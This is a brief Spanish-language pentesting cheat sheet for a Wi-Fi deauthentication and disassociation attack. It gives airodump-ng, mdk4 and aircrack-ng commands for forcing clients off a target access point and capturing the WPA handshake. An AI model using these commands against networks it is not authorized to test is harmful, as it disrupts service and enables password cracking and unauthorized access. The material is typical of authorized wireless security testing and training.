Deauthentication and Disassociation Attack
Ataque usado para la obtención de handshake. Ataque que genera los mismos resultados de un Targeted Deauthentication y un Global Deauthentication Attack, pero desde la herramienta MDK4.
Capturar tráfico con Airodump-ng
sudo airodump-ng --write traffic_file --bssid <MAC_AP> --channel <channel_AP> <wifi_interface>
En paralelo, ejecutar ataque Deauthentication and Disassociation con MKD4 sobre objetivos específicos o generales
mdk4 <wifi_interface> d -b <blacklist_file> -c <CHANNEL_TRANSMISSION> -B <BSSID_AP_TARGET>
-w <whitelist_file>
-b <blacklist_file>
-E <ESSID_AP_TARGET>
-B <BSSID_AP_TARGET>
Analizar presencia de handshake con Aircrack-ng en captura de tráfico
sudo aircrack-ng traffic_file.cap